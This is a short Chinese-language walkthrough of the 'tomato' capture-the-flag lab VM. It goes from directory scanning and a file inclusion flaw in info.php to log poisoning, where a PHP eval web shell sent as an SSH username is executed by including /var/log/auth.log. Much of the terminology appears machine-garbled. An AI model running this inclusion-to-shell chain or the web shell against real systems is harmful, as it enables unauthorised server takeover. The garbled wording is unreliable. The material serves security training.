tomato-靶机渗透

tomato-靶机

一、安装靶机环境

下载双击.ova文件，写文件名路径导入

打开假造机用NAT模式

编辑–>假造网络编辑器查看IP段

二、信息收集

1.御剑端口扫描查找该假造机的IP

访问网站

扫目次

1. dirb http://192.168.30.130

复制代码

收集到目次

1. /server-status
2. /antibot_image/
3. /index.html

复制代码

访问/antibot_image目次

在目次下找到info.php

查到

1. 根目录：/var/www/html
2. 用户名:webmaster@localhost

复制代码

查看info.php源代码，提示image参数用于文件包含

三、毛病渗透

写image参数=linux的系统文件，发现乐成表现，确定有文件包含毛病

2.发现端口没有全部扫描出来，利用这个命令扫描

1. nmap -A 192.168.30.130 -p-

复制代码

2211是ssl的毗连端口

1. ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211

复制代码

然后在网页端查看ubuntu报错信息：/var/log/auth.log

1. http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

复制代码

看到注入乐成，然后用蚁剑
URL地址

1. http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

复制代码

然后就可以控制整个文件

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。